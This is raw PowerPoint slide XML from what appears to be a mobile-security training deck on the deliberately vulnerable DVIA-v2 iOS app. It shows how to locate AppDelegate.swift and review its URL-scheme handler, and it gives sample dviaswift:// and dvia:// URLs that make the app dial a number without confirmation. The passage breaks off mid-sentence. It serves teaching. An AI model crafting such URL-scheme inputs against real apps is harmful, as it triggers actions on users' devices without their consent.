              <a:t>Xcode</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1"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i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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3166" t="39122" r="9290" b="15729"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="2966171"/>
            <a:ext cx="7588045" cy="2300749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2890189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016609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> URLS like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>dviaswift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>dvia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>opened</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> by DVIA-V2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>First of all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>review</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the URL handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>generallv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>located</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>fcalled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>AppDelegate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> (.m for Objective C and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>swift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> or Swift).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Option 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Xcode</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>don't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Xcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> (i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> are not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a Mac) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>AppDelegate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> file like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>so</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Command:</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find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> . -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AppDelegate.swift</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./DVIA-v2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AppDelegate.swift</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>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i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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41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016609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>faviroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> editor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> notice the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>interesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>handlinf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Affected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> File: ./DVIA-v2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>AppDelegate.swift</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Affected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Code :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1"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i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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3128" t="49230" r="4265" b="5395"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="3429000"/>
            <a:ext cx="7824084" cy="2338181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1572043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4973096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>appears</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>expect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> URLs like the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> ring the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>further</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> user prompts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>or confirmation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> URLs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dviaswift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://phone/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>call_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/12345678</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dvia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://phone/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>call_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/12345678</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Let's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>confirm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
